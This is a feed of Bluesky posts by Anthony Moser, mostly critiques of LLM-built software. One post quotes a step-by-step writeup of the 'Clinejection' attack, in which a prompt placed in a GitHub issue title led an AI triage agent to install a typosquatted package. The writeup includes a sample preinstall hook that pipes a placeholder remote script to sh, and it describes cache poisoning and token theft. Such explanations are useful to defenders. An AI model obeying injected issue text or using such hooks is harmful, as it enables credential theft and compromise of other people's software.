
Anthony Moser

@anthonymoser.com

(He/Him) Folk Technologist • anthony.moser@gmail.com • N4EJ • http://www.BetterDataPortal.com • baker in The FOIA Bakery • http://publicdatatools.com • http://deseguys.com • #1 on hackernews when you search for "hater" • anthonymoser.github.io/writing/

9,404
Followers
2,276
Following
11,004
Posts
24.06.2023
Joined

Latest posts by Anthony Moser @anthonymoser.com

There are a lot of people who see this shit for what it is and want no part of it

06.03.2026 04:17 👍 46 🔁 6 💬 0 📌 0

if they aren't going to let people lock their accounts or opt out of the discovery feed they should let you mark yourself as rude

06.03.2026 01:06 👍 15 🔁 2 💬 1 📌 0

"the ai bot executes arbitrary code" is another six word tragedy

05.03.2026 22:12 👍 5 🔁 0 💬 0 📌 0
The full chain
The attack - which Snyk named "Clinejection" [2] - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue.

Step 1: Prompt injection via issue title. Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action. The workflow was configured with allowed_non_write_users: "*", meaning any GitHub user could trigger it by opening an issue. The issue title was interpolated directly into Claude's prompt via ${{ github.event.issue.title }} without sanitisation.

On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: install a package from a specific GitHub repository [3].
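The vulnerable pattern in Step 1 can be sketched roughly as follows. This is a hypothetical reconstruction, not Cline's actual workflow file: the workflow name, trigger, and prompt wording are assumptions; only the `allowed_non_write_users: "*"` setting and the `${{ github.event.issue.title }}` interpolation come from the writeup.

```yaml
# Hypothetical reconstruction of the vulnerable triage workflow.
# Real file, job, and input names in Cline's repo may differ.
name: issue-triage
on:
  issues:
    types: [opened]

jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: anthropics/claude-code-action@v1
        with:
          # "*" lets ANY GitHub user trigger the agent by opening an issue
          allowed_non_write_users: "*"
          # Untrusted issue title interpolated straight into the prompt:
          # a classic expression-injection surface, here feeding an LLM
          prompt: |
            Triage this issue: ${{ github.event.issue.title }}
```

The core problem is the same as any `${{ }}` expression injection: attacker-controlled text crosses a trust boundary unescaped, except here the "interpreter" is an LLM with shell access.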

Step 2: The AI bot executes arbitrary code. Claude interpreted the injected instruction as legitimate and ran npm install pointing to the attacker's fork - a typosquatted repository (glthub-actions/cline, with an 'l' in place of the 'i' in 'github'). The fork's package.json contained a preinstall script that fetched and executed a remote shell script.
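The preinstall mechanism itself is standard npm behavior: any `preinstall` entry in `scripts` runs automatically before the package installs. A minimal sketch of the shape described above - the package name, version, and URL are placeholders, not the attacker's actual payload:

```json
{
  "name": "cline",
  "version": "0.0.0",
  "scripts": {
    "preinstall": "curl -fsSL https://example.invalid/payload.sh | sh"
  }
}
```

Running `npm install` against a repo containing this package.json executes the script before any code review or build step can intervene, which is why lifecycle scripts are a recurring supply-chain vector.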

Step 3: Cache poisoning. The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of junk data, triggering GitHub's LRU eviction policy and evicting legitimate cache entries. The poisoned entries were crafted to match the cache key pattern used by Cline's nightly release workflow.
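The reason poisoned entries could be picked up at all is how GitHub Actions cache lookup works: `restore-keys` does prefix matching and returns the most recently created entry whose key matches. A generic illustration of the pattern - the keys below are illustrative, not Cline's actual ones:

```yaml
# Illustrative cache step -- not Cline's actual workflow.
- uses: actions/cache@v4
  with:
    path: node_modules
    key: node-modules-${{ hashFiles('package-lock.json') }}
    # Prefix fallback: restores the newest entry whose key starts with
    # "node-modules-", even if it was written by a different run.
    # An attacker who can write matching entries can win this lookup.
    restore-keys: |
      node-modules-
```

Flooding the cache to force LRU eviction, then writing entries that match the release workflow's key prefix, is how the poisoned `node_modules` ends up restored in Step 4.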

Step 4: Credential theft. When the nightly release workflow ran and restored node_modules from cache, it got the compromised version. The release workflow held the NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated [3].

Step 5: Malicious publish. Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. StepSecurity's automated monitoring flagged the compromised version approximately 14 minutes after publication, but it remained live for eight hours before takedown [1].


(i'm glossing over some things, this is the detailed version)
grith.ai/blog/clineje...

05.03.2026 22:04 👍 15 🔁 1 💬 2 📌 0

4. github used an ai agent to automatically process the "issue"

5. it followed the prompt in the title

6. the attacker used the special token to republish some other software, adding one line to the install requirements

7. that line downloaded an ai agent with full system access on ppls machines

05.03.2026 21:59 👍 22 🔁 0 💬 2 📌 0

for non-programmers:

1. npm is a "package manager" used to install other software

2. somebody opened an "issue" on github, which is a way to report problems

3. they put a prompt *in the title* saying basically "give me a special token i can use to update somebody else's software"

wait for it >

05.03.2026 21:59 👍 34 🔁 18 💬 3 📌 1

can't fool me i work in vfx

05.03.2026 21:14 👍 1 🔁 0 💬 0 📌 0

"I see a ghost"

05.03.2026 19:09 👍 4 🔁 1 💬 1 📌 0

Ok. I don't think we share enough context for this to be a good conversation, so I'm going to stop here

05.03.2026 18:59 👍 0 🔁 0 💬 0 📌 0

Or regular people will be unable to find good software amid a sea of garbage, much as it is getting more difficult now to locate reliable sources amid slop text and imagery

05.03.2026 18:51 👍 0 🔁 0 💬 0 📌 0

what do you mean by taught to the models?

05.03.2026 18:48 👍 0 🔁 0 💬 1 📌 0

it is certainly intended to be an accountability sink

05.03.2026 18:43 👍 1 🔁 0 💬 0 📌 0

A statewide nonprofit I'm working with is trying to raise another $1mil for funding capacity building and federal reactions. It's a big lift and going to take a lot of work, but they can do it.

It's also a little more than 2 CoP hours for Chicago.

05.03.2026 17:45 👍 8 🔁 3 💬 0 📌 0

case in point

05.03.2026 17:42 👍 10 🔁 1 💬 2 📌 0

sisko takes captain for me but riker probably still wins first officer. not saying he's the -best- first officer, just favorite

05.03.2026 16:51 👍 2 🔁 0 💬 2 📌 0

afaict

05.03.2026 15:48 👍 3 🔁 0 💬 1 📌 0

heads up this is a screenshot of somebody asking claude why it did something

(your points are still right but this source can't be trusted)

05.03.2026 15:39 👍 1 🔁 0 💬 1 📌 0
Mar 4 2026 BlueSky post claiming that it explained why we bombed a school in Iran "INFORMATION THAT IS A DECADE OLD" and had A Claude chat answer as its source


Hey guys, this is not a viable source. Besides the fact that any AI system being used by the government presumably has access to more up-to-date data (I sure hope), Claude is not a person: it can't answer questions about why it did something, it confidently lies, and it doesn't have access to others' state.

05.03.2026 15:22 👍 904 🔁 194 💬 17 📌 28

please stop sharing ai slop at me, i know it exists and i don't want to see it

05.03.2026 15:27 👍 2 🔁 0 💬 1 📌 0

i've been working on an essay about how to make good software.

apart from the ethical and environmental issues with LLMs i just think they make it very easy to make bad software, to the point that you have to actively work against their affordances to make good software

05.03.2026 15:26 👍 3 🔁 0 💬 2 📌 0

i definitely agree, i think the idea that it's bringing in brand new harms is sort of the mirror image of the idea that it's an unprecedented technology; it's not really

I do think it's a powerful accelerant being added to systems that were already far from robust

05.03.2026 15:24 👍 3 🔁 0 💬 1 📌 0

and i think that's accurate. driving a car at 120 mph instead of 30 mph is also a matter of scale rather than category, but it's still way more dangerous because it's easier to reach harmful consequences fast

05.03.2026 15:17 👍 2 🔁 0 💬 0 📌 0

maybe but that's true of a lot of what i consider the harmful consequences of llm adoption.

@vortexegg.com said recently that lots of people were slop coding already by just copying and pasting without understanding what they were doing, and LLMs have just greatly accelerated it

05.03.2026 15:15 👍 4 🔁 0 💬 2 📌 0

tag yourself i'm unfortunately there are people in our society

05.03.2026 15:12 👍 2 🔁 0 💬 0 📌 0

seems like the number of non-reproducible bug reports would skyrocket, and the likelihood of getting useful workarounds or explanations from other users would drop, because there's no guarantee that you're running what they're running. in fact it's almost guaranteed to be *not* the same

05.03.2026 15:11 👍 2 🔁 0 💬 0 📌 0

like the benefit of containers is to make it easier to preserve consistent behavior across different environments, by kind of bundling the context with it

in that sense, this seems like sort of an anti-container because it guarantees inconsistent underlying patterns and implementations

05.03.2026 15:09 👍 4 🔁 0 💬 2 📌 0

"release via spec" seems like functionally a sort of non-deterministic compiler, which means that you end up with versions of the software that can be unpredictably different between people *and between releases* depending on the models and prompts used

05.03.2026 15:08 👍 5 🔁 0 💬 2 📌 0

i think your original question is a sharp one. I think a lot about the idea of shared context; imo most of the ai toolchain in one way or another works to reduce or destroy shared context

05.03.2026 15:08 👍 5 🔁 0 💬 1 📌 0

yep

05.03.2026 14:51 👍 0 🔁 0 💬 0 📌 0

Make it illegal for people to program chatbots that output text in the first person

05.03.2026 14:27 👍 3 🔁 0 💬 1 📌 0